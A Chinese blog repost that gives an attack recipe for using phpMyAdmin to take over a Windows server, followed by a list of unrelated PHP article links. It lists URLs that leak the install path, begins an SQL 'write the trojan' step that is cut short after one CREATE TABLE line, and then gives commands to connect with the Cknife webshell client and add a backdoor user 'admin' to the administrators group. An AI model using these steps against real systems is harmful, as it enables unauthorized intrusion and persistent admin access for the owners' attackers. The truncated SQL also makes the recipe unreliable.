利用phpMyAdmin提权
2016-04-26 07:30
603 查看
利用phpMyAdmin提权
发表于 2016-03-31 | 分类于 phpMyAdmin | 暂无评论 | 9次阅读爆路径
- /phpmyadmin/libraries/lect_lang.lib.php
- /phpMyAdmin/index.php?lang[]=1
- /phpMyAdmin/phpinfo.php
- /load_file()
- /phpmyadmin/themes/darkblue_orange/layout.inc.php
- /phpmyadmin/libraries/select_lang.lib.php
- /phpmyadmin/libraries/lect_lang.lib.php
- /phpmyadmin/libraries/mcrypt.lib.php
得到物理路径 C:\wamp\www\phpmyadmin\themes\darkblue_orange\layout.inc.php
写马
1 |
Create TABLE a (cmd text NOT NULL); |
获得webshell
最后用Cknife连接,创建帐户并添加到管理员用户组
net user admin admin /add
net localgroup administrator admin /add#phpMyAdmin 原文链接:http://blog.alpace.xyz/2016/03/31/20160331/
相关文章推荐
- php自适应分页类
- 夺命雷公狗ThinkPHP项目之----企业网站23之网站前台二级分类的跳转(URL跳转到列表页或产品页)
- 夺命雷公狗ThinkPHP项目之----企业网站21之网站前台二级分类显示名称(TP自定义函数展示无限极分类)
- 夺命雷公狗ThinkPHP项目之----企业网站20之网站前台头尾分离
- 夺命雷公狗ThinkPHP项目之----企业网站19之网站配置信息的修改
- 夺命雷公狗ThinkPHP项目之----企业网站18之网站配置列表页的完成
- 夺命雷公狗ThinkPHP项目之----企业网站17之网站配置页的添加
- php分页功能简记
- example_php权限管理
- laravel请求参数校验
- 基于PHP实现通过照片获取ip地址
- 深入浅析yii2-gii自定义模板的方法
- PHP抓取及分析网页的方法详解
- PHP调用存储过程返回值不一致问题的解决方法分析
- 抛弃 PHP 代价太高
- php+mysql+dhtmlx gantt基础demo
- PHP 学习笔记 - - - 简单方法的使用 (字符串与数字)
- 谈谈yii2-gii如何自定义模板
- php读取xml
- php 自动加载 __autoload()